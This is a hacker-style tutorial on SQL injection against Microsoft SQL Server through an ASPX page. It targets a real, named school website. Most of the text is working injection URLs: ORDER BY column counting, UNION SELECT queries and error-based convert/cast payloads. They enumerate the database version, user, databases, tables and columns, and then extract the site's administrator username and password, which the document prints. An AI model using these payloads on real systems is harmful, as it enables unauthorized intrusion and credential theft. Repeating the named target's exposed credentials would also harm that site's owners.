ms sql server injection

1. mssql server injection tutorial
2. This is how i injected mssql server or .aspx.
3. vul link=http://ogis.edu.in/ViewPhoto.aspx?gid=46
4. 1st way:
5. Finding version:
6. Code:
7. http://ogis.edu.in/
8. ViewPhoto.aspx?gid=46 or 1=cast
9. (@@version as int)
10. Finding database:
11. Code:
12. http://ogis.edu.in/
13. ViewPhoto.aspx?gid=46 or
14. 1=convert(int,db_name())
15. I will not go for deep about this method.There is
16. already tutorial about it here.
17. 2nd way:
18. 1.Finding no of columns:
19. Code:
20. http://ogis.edu.in/
21. ViewPhoto.aspx?gid=46 order by
22. 1-- -
23. it loads normal.Thats good.
24. Code:
25. http://ogis.edu.in/
26. ViewPhoto.aspx?gid=46 order by
27. 10-- -
28. output:
29. so lets reduce it
30. Code:
31. http://ogis.edu.in/
32. ViewPhoto.aspx?gid=46 order by
33. 9-- -
34. Page loads normal.So there are 9 columns.
35. 2. Next we do UnIOn all seLect .
36. Remember in mssql with aspx you will never get
37. vul columns.You have to find it manually.
38. Code:
39. http://ogis.edu.in/
40. ViewPhoto.aspx?gid=46 UNION all
41. SELECT 1,2,3,4,5,6,7,8,9-- -
42. output:
43. Dont worry.Now two ways from here.
44. 1 way (easy) : this way will work rarely and its
45. normal injection.
46. Just change gid=46 to gid=-46 .
47. so injection will be
48. Code:
49. http://ogis.edu.in/
50. ViewPhoto.aspx?gid=-46 UNION all
51. SELECT 1,2,3,4,5,6,7,8,9-- -
52. output:
53. [Image: 50983947.jpg]
54. vul col=2
55. version=
56. Code:
57. http://ogis.edu.in/
58. ViewPhoto.aspx?gid=-46 UNION all
59. SELECT
60. 1,@@version,3,4,5,6,7,8,9-- -
61. @@version gives version in mssql .
62. Remember version() will not work here.
63. user=
64. Code:
65. http://ogis.edu.in/
66. ViewPhoto.aspx?gid=-46 UNION all
67. SELECT 1,user_name
68. (),3,4,5,6,7,8,9-- -
69. You can also use current_user , user ,
70. system_user instead of user_name() .
71. database=
72. Code:
73. http://ogis.edu.in/
74. ViewPhoto.aspx?gid=-46 UNION all
75. SELECT 1,db_name
76. (),3,4,5,6,7,8,9-- -
77. db_name() gives primary database.
78. Now replace db_name() with db_name(1),db_name
79. (2),..,db_name(n) till you get databases.
80. Code:
81. http://ogis.edu.in/
82. ViewPhoto.aspx?gid=-46 UNION all
83. SELECT 1,db_name
84. (1),3,4,5,6,7,8,9-- -
85. Code:
86. http://ogis.edu.in/
87. ViewPhoto.aspx?gid=-46 UNION all
88. SELECT 1,db_name
89. (11),3,4,5,6,7,8,9-- -
90. Code:
91. http://ogis.edu.in/
92. ViewPhoto.aspx?gid=-46 UNION all
93. SELECT
94. 1,schema_name,3,4,5,6,7,8,9
95. from
96. information_Schema.schemata-- -
97. This gives all databases in one.
98. Tables=
99. Code:
100. http://ogis.edu.in/
101. ViewPhoto.aspx?gid=-46 UNION all
102. SELECT
103. 1,table_name,3,4,5,6,7,8,9 from
104. information_Schema.tables where
105. table_schema!=db_name()-- -
106. Here !=db_name() means other than primary
107. database.
108. So we get tables of other databases. spicy table is
109. o_adminmst.
110. columns=
111. Code:
112. http://ogis.edu.in/
113. ViewPhoto.aspx?gid=-46 UNION all
114. SELECT
115. 1,column_name,3,4,5,6,7,8,9
116. from information_Schema.columns
117. where table_name='o_adminmst'--
118. -
119. data=
120. Code:
121. http://ogis.edu.in/
122. ViewPhoto.aspx?gid=-46 UNION all
123. SELECT 1,username,3,4,5,6,7,8,9
124. from o_adminmst-- -
125. username=admin
126. Code:
127. http://ogis.edu.in/
128. ViewPhoto.aspx?gid=-46 UNION all
129. SELECT 1,password,3,4,5,6,7,8,9
130. from o_adminmst-- -
131. pass=admin123#.
132. 2nd way(important) : This way will work with
133. UnIoN in many sites and challenges.
134. Lets You stuck here :
135. Code:
136. http://ogis.edu.in/
137. ViewPhoto.aspx?gid=46 UNION all
138. SELECT 1,2,3,4,5,6,7,8,9-- -
139. Now replace all columns with NULL
140. so it will like
141. Code:
142. http://ogis.edu.in/
143. ViewPhoto.aspx?gid=46 UNION all
144. SELECT
145. null,null,null,null,null,null,
146. null,null,null-- -
147. Now starts replacing every null with convert
148. (int,@@version) or cast(version() as int).
149. In my case replacing with first null gives answer.
150. Code:
151. http://ogis.edu.in/
152. ViewPhoto.aspx?gid=46 UNION all
153. SELECT convert
154. (int,@@version),null,null,null,
155. null,null,null,null,null-- -
156. Code:
157. http://ogis.edu.in/
158. ViewPhoto.aspx?gid=46 UNION all
159. SELECT cast(@@version as
160. int),null,null,null,null,null,
161. null,null,null-- -
162. user=
163. Code:
164. http://ogis.edu.in/
165. ViewPhoto.aspx?gid=46 UNION all
166. SELECT cast(user_name() as
167. int),null,null,null,null,null,
168. null,null,null-- -
169. output=
170. Conversion failed when converting the nvarchar
171. value 'db_ogis ' to data type int.
172. You can also use current_user , user ,
173. system_user instead of user_name() .
174. database=
175. Code:
176. http://ogis.edu.in/
177. ViewPhoto.aspx?gid=46 UNION all
178. SELECT cast(db_name() as
179. int),null,null,null,null,null,
180. null,null,null-- -
181. output=
182. Conversion failed when converting the nvarchar
183. value 'db_ogis ' to data type int.
184. Tables=
185. Code:
186. http://ogis.edu.in/
187. ViewPhoto.aspx?gid=46 UNION all
188. SELECT convert(int,(select top 1
189. table_name from
190. information_schema.tables where
191. table_schema!=db_name
192. ())) ,null,null,null,null,null,
193. null,null,null-- -
194. output=Conversion failed when converting the
195. nvarchar value 'o_updatemst ' to data type int.
196. for next table
197. Code:
198. http://ogis.edu.in/
199. ViewPhoto.aspx?gid=46 UNION all
200. SELECT convert(int,(select top 1
201. table_name from
202. information_schema.tables where
203. table_schema!=db_name() and
204. table_name<>'o_updatemst')) ,
205. null,null,null,null,null,null,
206. null,null-- -
207. output=Conversion failed when converting the
208. nvarchar value 'o_pagemaster ' to data type int.
209. columns=
210. Code:
211. http://ogis.edu.in/
212. ViewPhoto.aspx?gid=46 UNION all
213. SELECT convert(int,(select top 1
214. column_name from
215. information_schema.columns where
216. table_name='o_adminmst')) ,null,
217. null,null,null,null,null,null,
218. null-- -
219. Conversion failed when converting the nvarchar
220. value 'adminid' to data type int.
221. for next column same as table
222. Code:
223. http://ogis.edu.in/
224. ViewPhoto.aspx?gid=46 UNION all
225. SELECT convert(int,(select top 1
226. column_name from
227. information_schema.columns where
228. table_name='o_adminmst' and
229. column_name<>'adminid')) ,null,
230. null,null,null,null,null,null,
231. null-- -
232. Conversion failed when converting the nvarchar
233. value 'username' to data type int.
234. data=
235. Code:
236. http://ogis.edu.in/
237. ViewPhoto.aspx?gid=46 UNION all
238. SELECT convert(int,(select top 1
239. username from
240. o_adminmst)) ,null,null,null,
241. null,null,null,null,null-- -
242. Conversion failed when converting the varchar
243. value 'admin' to data type int.
244. Code:
245. http://ogis.edu.in/
246. ViewPhoto.aspx?gid=46 UNION all
247. SELECT convert(int,(select top 1
248. password from
249. o_adminmst)) ,null,null,null,
250. null,null,null,null,null-- -
251. Conversion failed when converting the varchar
252. value 'admin123# ' to data type int.
253. You can use %2b to get username and password
254. at one time.
255. %2b=+
256. Code:
257. http://ogis.edu.in/
258. ViewPhoto.aspx?gid=46 UNION all
259. SELECT convert(int,(select top 1
260. username%2b'/'%2bpassword from
261. o_adminmst)) ,null,null,null,
262. null,null,null,null,null-- -
263. Conversion failed when converting the varchar
264. value 'admin/admin123# ' to data type int.
265. Thants it.